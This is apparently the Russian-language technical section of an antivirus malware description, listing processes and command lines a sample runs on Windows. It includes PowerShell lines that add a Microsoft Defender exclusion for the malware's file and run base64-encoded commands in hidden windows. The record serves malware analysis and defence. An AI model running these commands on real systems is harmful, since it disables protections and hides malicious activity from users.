Техническая информация
- %WINDIR%\microsoft.net\framework\v4.0.30319\aspnet_wp.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\aspnet_wp.exe
- Средство контроля пользовательских учетных записей (UAC)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath "<Полный путь к файлу>" -Force
- %WINDIR%\microsoft.net\framework\v4.0.30319\aspnet_wp.exe
- <SYSTEM32>\securityhealthsystray.exe
- %WINDIR%\syswow64\dllhost.exe
- %TEMP%\file-5496.putik
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAO...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath "<Полный путь к файлу>" -Force' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAO...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\aspnet_wp.exe'
- '%WINDIR%\syswow64\dllhost.exe'